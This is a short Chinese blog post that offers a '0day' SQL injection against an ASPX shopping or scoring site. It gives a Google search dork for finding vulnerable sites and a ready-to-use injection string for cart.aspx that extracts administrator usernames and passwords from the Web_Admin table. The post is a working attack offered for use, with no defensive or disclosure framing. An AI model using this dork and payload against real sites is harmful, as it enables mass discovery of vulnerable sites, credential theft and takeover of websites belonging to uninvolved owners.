这里公布一个关于aspx网站程序的oday方法很简单。直接爆出管理密码。
也是利用注入漏洞。
谷歌搜索关键字:inurl:scoreindex.aspx
利用代码
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 —
© Hunter丶Blog | Powered by LOFTER